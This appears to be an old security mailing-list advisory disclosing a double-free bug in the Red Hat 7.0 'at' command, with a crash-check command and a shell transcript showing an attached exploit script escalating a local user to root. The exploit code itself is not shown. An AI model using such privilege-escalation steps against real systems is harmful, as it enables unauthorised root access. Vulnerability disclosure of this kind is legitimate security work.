'/usr/bin/at 31337 + vuln' problem + exploit

[zen-parse <zen-parse () gmx net>]

Affects: /usr/bin/at 

To check if you are potentially vulnerable to this exploit, execute:
  /usr/bin/at 31337 + vuln

If you are vulnerable this will cause:
Segmentation fault 

If not, there will be a message similar to: 
Garbled time
(possibly with some extra information)

The problem is caused by a bug in the parser which deallocates the same 
memory location twice.

This can sometimes be exploited, for the uid of "daemon",  and due to some 
other minor problems, may allow root access from there.

Attached is an exploit for Redhat 7.0.

bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3 
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s 
"Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$ 

-- zen-parse

-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse () gmx net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.

Attachment: attn.tar.gz
Description: Local root exploit (rh 7.0)